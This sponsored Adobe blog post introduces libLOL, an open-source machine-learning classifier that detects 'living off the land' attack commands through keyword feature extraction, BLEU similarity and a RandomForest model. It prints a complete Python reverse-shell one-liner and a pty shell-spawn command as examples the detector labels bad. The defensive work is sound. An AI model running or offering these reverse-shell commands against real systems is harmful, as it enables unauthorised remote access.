Editor’s note: The following is a sponsored blog post from Adobe.
In security, “Living off the Land” (LotL or LOTL) attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it’s not novel, LotL is still one of the preferred approaches, even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no “footprints,” such as random binaries or scripts, on the system. This stealth is exactly why it’s often very difficult to determine which of these actions come from a valid system administrator and which come from an attacker. It’s also why static rules can trigger so many false positives, and why compromises can go undetected.
Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it often becomes easier to retire and rewrite them than to maintain and update them.
The security intelligence team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic, high-confidence tool called the LotL Classifier, and then we open-sourced it to the broader community.
The LotL Classifier is unique because it uses a supervised learning approach: it maps an input to an output based on example input-output pairs.
LotL Classifier has two basic components:
- Feature extraction
- An ML-based Classifier algorithm
Feature Extraction
The Feature Extraction (FE) component takes as input open source and other representative incident data (i.e., real malware attacks) along with actual log data, and creates a data set that describes each command, using hundreds of keywords, regexes, and static rules to help detect similarities.
Figure 1: Feature extraction
The feature extraction process is inspired by human experts and analysts: When analyzing a command line, humans rely on certain cues, such as which binaries are being used and which paths are accessed. Then they quickly browse through the parameters and, if present in the command, look at domain names, IP addresses, and port numbers. So, we designed the feature extraction process to mimic this typical human process and created labels for the same classes of features: Binaries, Keywords, Patterns, Paths, Networks, and Similarity.
Figure 2: An example of generated tags for a typical reverse shell.
Command: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("11.12.133.14"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Extracted features: IP_LOOPBACK IP_PUBLIC PATH_/BIN/SH COMMAND_EXPORT COMMAND_PYTHON COMMAND_FOR KEYWORD_-C KEYWORD_SOCKET KEYWORD_OS KEYWORD_PTY KEYWORD_PTY.SPAWN python_spawn python_socket python_shell import_pty
Prediction: BAD
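To make the idea concrete, here is a minimal sketch of this kind of tag extraction. The binaries, keywords, and regexes below are illustrative stand-ins, not libLOL's actual rule set, which spans hundreds of entries:

```python
import re

# Illustrative stand-ins for the hundreds of keywords, regexes, and
# static rules the real extractor uses.
KNOWN_BINARIES = {"python", "bash", "curl", "export"}
SUSPICIOUS_KEYWORDS = {"-c", "socket", "pty", "pty.spawn"}
PATH_RE = re.compile(r"(?:/[\w.-]+)+")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def extract_tags(command: str) -> list[str]:
    """Mimic an analyst's first pass: binaries, keywords, paths, and IPs."""
    tags = []
    for token in re.split(r'[\s;\'"()=,]+', command.lower()):
        if token in KNOWN_BINARIES:
            tags.append(f"COMMAND_{token.upper()}")
        elif token in SUSPICIOUS_KEYWORDS:
            tags.append(f"KEYWORD_{token.upper()}")
    for path in PATH_RE.findall(command):
        tags.append(f"PATH_{path.upper()}")
    for ip in IP_RE.findall(command):
        # Loopback addresses get their own label, as in the example above.
        tags.append("IP_LOOPBACK" if ip.startswith("127.") else "IP_PUBLIC")
    return tags

print(extract_tags("python -c \"import pty;pty.spawn('/bin/sh')\""))
# ['COMMAND_PYTHON', 'KEYWORD_-C', 'KEYWORD_PTY', 'KEYWORD_PTY.SPAWN', 'PATH_/BIN/SH']
```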
Figure 3: Similarity techniques
Similarity Testing
Once the data set is complete, the FE component conducts a similarity test as a secondary validation mechanism. To accomplish this, we use the BLEU (BiLingual Evaluation Understudy) metric: a number between zero and one, typically used in machine translation to measure how similar a candidate translation of a sentence is to a reference translation. For the LotL Classifier, we use the BLEU score to express the functional similarity of two command lines that share common patterns in their parameters. Intuitively, the Levenshtein distance is also a good candidate for this task; however, during our manual validation we concluded that weighted BLEU provides better results.
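As a rough illustration of the idea, the sketch below scores a candidate command against a known LotL command with NLTK's BLEU implementation; the tokenization and weights here are illustrative choices, not the exact configuration libLOL uses:

```python
from nltk.translate.bleu_score import sentence_bleu, SmoothingFunction

def command_similarity(known: str, candidate: str) -> float:
    """Score how closely a candidate command line resembles a known LotL one."""
    reference = [known.split()]
    hypothesis = candidate.split()
    # Weighted BLEU: command lines are short, so we weight lower-order
    # n-grams more heavily than the default uniform weights.
    return sentence_bleu(
        reference,
        hypothesis,
        weights=(0.5, 0.3, 0.2),
        smoothing_function=SmoothingFunction().method1,
    )

known = "python -c import pty;pty.spawn('/bin/sh')"
candidate = "python3 -c import pty;pty.spawn('/bin/bash')"
score = command_similarity(known, candidate)
print(f"BLEU similarity: {score:.2f}")
# A sufficiently high score would produce the LOOKS_LIKE_KNOWN_LOL tag.
```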
Figure 4: An example of a well-known command generating a similarity/LOOKS_LIKE_KNOWN_LOL label, bypassing the ML classification
Command: python -c "import pty;pty.spawn('/bin/sh')"
Extracted features: PATH_/BIN/SH COMMAND_PYTHON KEYWORD_-C KEYWORD_PTY KEYWORD_PTY.SPAWN python_spawn python_shell import_pty LOOKS_LIKE_KNOWN_LOL
Prediction: BAD
In simpler terms: If it looks like a duck, swims like a duck, and quacks like a duck, then it probably is a duck.
Machine Learning (ML) Classifier
With the tags generated in the feature extraction process, the data set is ready for the decision component of the project. The ML Classifier takes the data set and labels each command as good or bad. During testing, we tried a variety of classifiers, but we got the best results, in terms of both accuracy and speed, with the RandomForest classifier. In the latest in-house training, using a test data set representative of “real-world” situations, five-fold validation produced an average F1 score of 0.95 with a standard deviation of 0.013.
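A minimal sketch of that evaluation setup with scikit-learn might look like the following; the toy data set is purely illustrative, standing in for the much larger labeled corpus used in the real training:

```python
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import cross_val_score

# Toy data: each sample is the space-joined tag string produced by
# feature extraction, labeled good (0) or bad (1).
samples = [
    "COMMAND_LS PATH_/TMP",                                 # benign
    "COMMAND_TAR KEYWORD_-CZF PATH_/VAR/LOG",               # benign
    "COMMAND_PYTHON KEYWORD_-C KEYWORD_PTY PATH_/BIN/SH",   # reverse shell
    "COMMAND_EXPORT IP_PUBLIC KEYWORD_SOCKET python_shell", # reverse shell
] * 25  # repeated so five-fold validation has data in every fold
labels = [0, 0, 1, 1] * 25

# One-hot encode the tag vocabulary; tags are already whitespace-separated.
X = CountVectorizer(analyzer=str.split).fit_transform(samples)

clf = RandomForestClassifier(n_estimators=100, random_state=42)
scores = cross_val_score(clf, X, labels, cv=5, scoring="f1")
print(f"F1: {scores.mean():.2f} +/- {scores.std():.3f}")
```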
In the end, the project produces two main pieces of information about a command:
- A classification (decision) of the command in the input set as good or bad
- A set of tags, or labels, that describe the command itself and can be pipelined into different rules-based automation (RBA) or anomaly-detection projects, such as our recently open-sourced One Stop Anomaly Shop (OSAS); see the sketch below
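For instance, a downstream consumer could attach both outputs to the original log event before handing it to an RBA rule or to OSAS. The classify helper below is a hypothetical stand-in for whatever interface you wire up, not libLOL's actual API:

```python
def classify(command: str) -> tuple[str, list[str]]:
    """Hypothetical stand-in for the feature-extraction + ML pipeline."""
    # Placeholder logic only; the real decision comes from the ML classifier.
    tags = ["KEYWORD_PTY.SPAWN", "python_shell"] if "pty.spawn" in command else []
    return ("BAD" if tags else "GOOD"), tags

def enrich_event(event: dict) -> dict:
    """Attach the verdict and tags so downstream RBA/OSAS rules can use them."""
    verdict, tags = classify(event["command"])
    return {**event, "lotl_verdict": verdict, "lotl_tags": tags}

event = {"host": "web-01", "command": "python -c \"import pty;pty.spawn('/bin/sh')\""}
print(enrich_event(event))
```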
A Final Note
We have recently open sourced the project at http://github.com/adobe/libLOL. The RandomForest classifier is baked in, but if you want to use a different classifier, our OSAS project can help you do that. You can also experiment with different classifiers and compare the results on your own datasets.
We hope you find the tool useful, and we welcome feedback via our GitHub project page as we continue to improve it.